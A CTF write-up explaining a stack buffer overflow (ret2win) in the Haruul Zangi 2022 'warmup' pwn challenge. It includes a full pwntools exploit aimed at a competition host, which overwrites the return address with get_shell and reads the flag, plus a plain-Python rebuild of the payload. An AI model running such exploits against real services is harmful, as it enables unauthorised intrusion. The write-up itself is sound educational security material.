Haruul Zangi writeup: pwn - warmup

This is a writeup of the pwn challenge “warmup” from the final round of the “Харуул занги 2022” (Haruul Zangi 2022) competition.

File: warmup: ELF 64-bit LSB executable, x86-64

Checking the exploit mitigations on the binary:

NX is enabled, so shellcode cannot be executed directly from the stack or from a global variable, but there is no stack canary, so a buffer overflow is possible. (Input is read from the user with the read function.)

Offset at which the instruction pointer is controlled:

For this challenge it was enough to redirect execution to the get_shell function.

payload = padding + base +

Final exploit:

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./warmup --host 139.162.18.38 --port 23334
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./warmup')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '139.162.18.38'
port = int(args.PORT or 23334)

def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

offset = 383                      # bytes from the start of the buffer to the saved return address
get_shell = 0x0000000000401182    # address of get_shell (binary is not PIE, so it is fixed)

# flat() pads with filler up to `offset`, then appends get_shell as an
# 8-byte little-endian value so it overwrites the saved return address.
payload = flat({
  offset: get_shell
})

io.sendlineafter(b'Welcome to echo service.', payload)

io.recvuntil(b"End?[Y/N]")
io.sendline(b"Y")
io.recvuntil(b"[Y/N] ")
io.sendline(b"cat flag.txt")
flag = io.recv()
success(flag.decode())
```
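As an added example (not part of the original writeup), the same payload layout in plain Python without pwntools, using the offset and get_shell address from above. It also makes the point behind the "read function" remark explicit: the packed 8-byte address contains NUL bytes, which a raw read(2) into the buffer passes through unchanged, whereas a gets()/strcpy()-style copy would stop at the first NUL and never reach the return address.

```python
import struct

# Values taken from the writeup above.
OFFSET = 383          # bytes from the start of the buffer to the saved return address
GET_SHELL = 0x401182  # address of get_shell in the non-PIE binary


def build_ret2win_payload(offset: int, target: int) -> bytes:
    """Plain-Python equivalent of pwntools flat({offset: target}):
    `offset` bytes of filler followed by the 8-byte little-endian target."""
    return b"A" * offset + struct.pack("<Q", target)


def return_address_controlled(payload: bytes, offset: int, target: int) -> bool:
    """True when the 8 bytes that land on the saved return address equal `target`."""
    if len(payload) < offset + 8:
        return False
    return struct.unpack("<Q", payload[offset:offset + 8])[0] == target


def delimiter_bytes(payload: bytes) -> dict:
    """Count the bytes that string-oriented input routines treat as terminators.
    read(2) copies raw bytes and ignores all of them; gets()/fgets() stop at a
    newline and strcpy()/strlen()-based copies stop at the first NUL."""
    return {
        "nul": payload.count(b"\x00"),
        "newline": payload.count(b"\n"),
        "first_nul_index": payload.find(b"\x00"),
    }


def survives_nul_terminated_copy(payload: bytes, offset: int) -> bool:
    """Would a strcpy()-style copy of `payload` still reach the return address?
    Only if no NUL byte occurs before offset + 8."""
    first_nul = payload.find(b"\x00")
    return first_nul == -1 or first_nul >= offset + 8


if __name__ == "__main__":
    p = build_ret2win_payload(OFFSET, GET_SHELL)
    print(len(p), delimiter_bytes(p))
    print("read(2) path reaches RIP:", return_address_controlled(p, OFFSET, GET_SHELL))
    print("strcpy path reaches RIP:", survives_nul_terminated_copy(p, OFFSET))
```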


Me: bilguunz (Bilguun) · GitHub
